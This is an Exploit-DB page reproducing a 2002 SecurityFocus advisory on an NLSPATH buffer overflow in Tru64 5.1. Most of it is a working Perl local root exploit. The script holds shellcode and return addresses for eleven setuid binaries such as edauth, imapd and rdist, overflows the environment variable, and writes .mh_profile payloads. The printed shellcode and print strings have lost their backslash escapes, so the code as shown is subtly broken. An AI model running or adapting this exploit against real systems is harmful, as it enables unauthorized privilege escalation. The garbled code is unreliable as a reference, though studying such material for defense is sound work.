https://www.exploit-db.com/exploits/21772

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/5647/info

Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.

A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges. 

              

#!/usr/bin/perl -w
#


# Tru64 5.1 NLSPATH
#
# stripey ([email protected]) - 03/07/2002
#

$tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";
$tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";
$tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";
$tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";
$tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";
$tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";
$tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid $DISPLAY";
$tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid $DISPLAY";
$tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";
$tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";
$tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";

unless (($target,$offset,$align) = @ARGV,$align) {

        print "-"x72;
        print "n        Tru64 NLSPATH overflow, [email protected], 03/07/2002n";
        print "-"x72;
        print "nnUsage: $0 <target> <offset> <align>nnTargets:nn";

        foreach $key (sort(keys %tgts)) {
                ($a,$b,$c) = split(/:/,$tgts{"$key"});
                print "t$key. $b ( $c )n";
        }

        print "n";
        exit 1;
}

($a,$b) = split(/:/,$tgts{"$target"});

print "*** Target: $b, Offset: $offset, Align: $align ***nn";

$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);

$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";

$tlen = (1024-(length($sc)))/4;

$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;

$ENV{"NLSPATH"} = $buf;

if ($target eq 8) { print "Hit ctrl-d...n"; }

if ($target eq 3) {

        $buf_b  = "AA";
        $buf_b .= pack("l",0x47ff041f)x512;
        $buf_b .= $sc;

        open(OH,">.mh_profile");
        print OH "Path: $buf_bn";
        close(OH);
}

if ($target eq "4") {

        $buf_b  = "AA";
        $buf_b .= pack("l",0x47ff041f)x2000;
        $buf_b .= $sc;

        open(OH,">.mh_profile");
        print OH "Path: $buf_bn";
        close(OH);
}

if ($target eq 2) {

        exec("$b","-d","a=asdf","-c","/tmp/","'${a}'");

}
if ($target eq 0) {

        $buf_b = "B"x30000;
        exec("$b","-g","-dt",$buf_b);

}

exec("$b");